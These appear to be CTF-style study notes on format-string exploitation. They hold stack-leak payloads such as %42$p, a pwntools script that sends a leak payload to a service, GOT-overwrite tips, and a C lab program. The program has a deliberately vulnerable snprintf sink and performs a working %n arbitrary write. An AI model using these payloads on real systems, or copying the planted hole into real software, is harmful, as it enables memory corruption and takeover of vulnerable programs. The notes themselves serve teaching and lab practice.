Format String
- Read and write values from the stack
- axcheron's writeup
Read
- Input one %x per value you want to read from the stack, i.e.
%x
repeated once for every stack value to dump:
%x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x %x
- Read full 8-byte (long long) values from the stack with
%llx
- Select a value by position, e.g. the second argument interpreted as a string (dereferenced as a char *)
%2$s
- Another way of reading is via %p, which prints a pointer-sized value as 0x-prefixed hex
%p
- Read the pointer-sized value at argument offset 42
%42$p
- ir0stone's pwn-notes contains some useful pwntools scripts, like this one:
from pwn import *
target_ip = '127.0.0.1'  # replace with the target host
#p = process('./vuln')
p = remote(target_ip, 9006)
payload = b'%14$p||||'    # leak the 14th argument as a pointer; the '|' separators delimit the leaked value
payload += p32(0x8048000)  # a raw 32-bit address packed into the payload
p.sendline(payload)
log.info(p.clean())
Offset
- Read the value at the 42nd argument position on the stack as a pointer
%42$p
- If the value at that offset is a pointer to a string, dereference it with
%42$s
Length of output
- Pad the first argument to the given width (here 31337 characters); the number of characters written so far is what %n stores, so the width controls the value written
%31337x
Parameters
Parameter | Type | Passed as
---|---|---
%d | decimal (int) | value
%u | unsigned decimal (unsigned int) | value
%x | hexadecimal (unsigned int) | value
%p | pointer (void *), printed as hex with a 0x prefix | value
%s | string ((const) (unsigned) char *) | reference
%n | writes the number of characters output so far into the pointed-to int (int *) | reference
Tips and Tricks
- Overwrite GOT entries when the binary is not built with Full RELRO, i.e. when the GOT is still writable
- Find where your input lands on the stack: write
AAAA
followed by %N$p and raise N until the output shows 0x41414141, e.g.
AAAA%6$p
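Worked example, added here and not taken from axcheron's writeup or the pwn-notes: a deliberately vulnerable C sink that uses attacker bytes as the format, the stack probe from the Read and Tips sections (done with a run of %lx instead of %N$p so it does not depend on the libc accepting gaps in positional arguments), and the %n write driven by a width-padded conversion as in the Length of output section. It assumes a 64-bit SysV-style ABI (x86-64 or AArch64 Linux) with glibc or musl; `vulnerable`, `find_buffer_offset`, `write_via_format` and the global `target` (a stand-in for a GOT entry) are names made up for this example.

```c
/* Added example: vulnerable format-string sink, stack probe, and %n write.
 * Assumes a 64-bit SysV-style ABI (x86-64 / AArch64 Linux) with glibc or musl.
 * `target` stands in for a writable pointer target such as a GOT entry. */
#undef _FORTIFY_SOURCE   /* a fortified snprintf aborts on %n in a writable format string */
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* The non-literal format is the bug under study; silence the warnings meant to catch it. */
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"

#define BUF_SIZE  512     /* size of the vulnerable stack buffer */
#define MAX_SLOTS 64      /* argument slots dumped by the probe (covers BUF_SIZE) */
#define PREFIX    128     /* directive bytes before the embedded address: 16 slots */

static char out[1 << 16]; /* large enough that the padded output is never truncated */
int target = 0;           /* hypothetical write target (a GOT entry in a real exploit) */

/* Vulnerable sink: copies raw bytes, as read(2) into a buffer would, then uses them as
 * the format. noinline keeps the frame layout identical for the probe and the write. */
static int __attribute__((noinline)) vulnerable(const void *data, size_t len)
{
    _Alignas(16) char buf[BUF_SIZE];   /* 16-aligned, so buf[0] starts a va_arg slot */
    if (len >= sizeof buf)
        len = sizeof buf - 1;
    memcpy(buf, data, len);
    buf[len] = '\0';
    return snprintf(out, sizeof out, buf);   /* BUG: attacker-controlled format string */
}

/* Probe: "AAAAAAAAAAAAAAAA|%lx|%lx|..." dumps MAX_SLOTS argument slots. The first field
 * equal to a slot full of 'A' is buf[0]; its 1-based index is the %N$ position of our
 * input (the "AAAA%6$p" trick, done without positional arguments). Returns -1 if not found. */
int find_buffer_offset(void)
{
    unsigned long marker;
    char want[2 * sizeof marker + 1];
    memset(&marker, 'A', sizeof marker);
    snprintf(want, sizeof want, "%lx", marker);   /* what a slot full of 'A' prints as */

    char fmt[BUF_SIZE];
    size_t n = 16;                /* 16 marker bytes: two full slots of 'A' */
    memset(fmt, 'A', n);
    fmt[n++] = '|';
    for (int i = 0; i < MAX_SLOTS; i++, n += 4)
        memcpy(fmt + n, "%lx|", 4);
    vulnerable(fmt, n);

    char *field = strchr(out, '|');            /* out = "AAAA...|<slot1>|<slot2>|..." */
    for (int idx = 1; field && idx <= MAX_SLOTS; idx++) {
        field++;
        char *end = strchr(field, '|');
        if (!end)
            break;
        *end = '\0';
        if (strcmp(field, want) == 0)
            return idx;
        field = end;
    }
    return -1;
}

/* Write: payload = [(T-2) x "%c"]["%<W>c"]["%n"][filler to PREFIX][8-byte address].
 * Each "%c" consumes one slot and prints one char, "%<W>c" prints W chars, and %n then
 * consumes slot T, where the address sits, storing the running count (T-2)+W = value.
 * The address goes last because its zero bytes would end the format string early.
 * Returns the value now in *target_ptr, or -1 if the layout cannot be satisfied. */
int write_via_format(int *target_ptr, int value)
{
    int k = find_buffer_offset();
    if (k < 0)
        return -1;
    int T = k + PREFIX / 8;          /* slot index of the embedded address */
    int width = value - (T - 2);     /* chars still needed once the %c's are counted */
    if (width < 1 || 2 * (T - 2) + 14 > PREFIX)
        return -1;

    char payload[PREFIX + sizeof(uintptr_t)];
    size_t n = 0;
    for (int i = 0; i < T - 2; i++, n += 2)
        memcpy(payload + n, "%c", 2);
    n += (size_t)snprintf(payload + n, PREFIX - n, "%%%dc%%n", width);
    memset(payload + n, '.', PREFIX - n);   /* filler is printed after %n, so not counted */
    uintptr_t addr = (uintptr_t)target_ptr;
    memcpy(payload + PREFIX, &addr, sizeof addr);

    vulnerable(payload, sizeof payload);
    return *target_ptr;
}

int main(void)
{
    printf("input buffer is argument %%%d$\n", find_buffer_offset());
    printf("target after write: %d\n", write_via_format(&target, 31337));
    return 0;
}
```

Build it with a plain `gcc` or `clang` invocation. `_FORTIFY_SOURCE` is undefined at the top on purpose: a fortified glibc `snprintf` aborts with "%n in writable segment detected", which is exactly the mitigation you run into on a target built with it, alongside Full RELRO making the GOT read-only.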